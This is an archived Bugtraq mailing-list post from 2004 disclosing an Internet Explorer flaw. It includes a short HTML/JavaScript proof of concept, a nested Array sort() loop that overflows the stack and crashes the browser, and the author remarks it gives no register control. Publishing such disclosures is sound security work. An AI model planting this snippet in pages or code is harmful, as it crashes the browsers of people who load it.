Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: MSIE flaws: nested array sort() loop Stack overflow exception

MSIE flaws: nested array sort() loop Stack overflow exception

From: Berend-Jan Wever <skylined_at_edup.tudelft.nl>
Date: Thu, 25 Nov 2004 01:41:20 +0100

Hi all,

Another flaw in IE:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more then willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow.

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) But more on that later...
PS2. Recursive function call will cause stack overflow causing write exception in guard page on a push, no control over registers.
Received on Nov 25 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]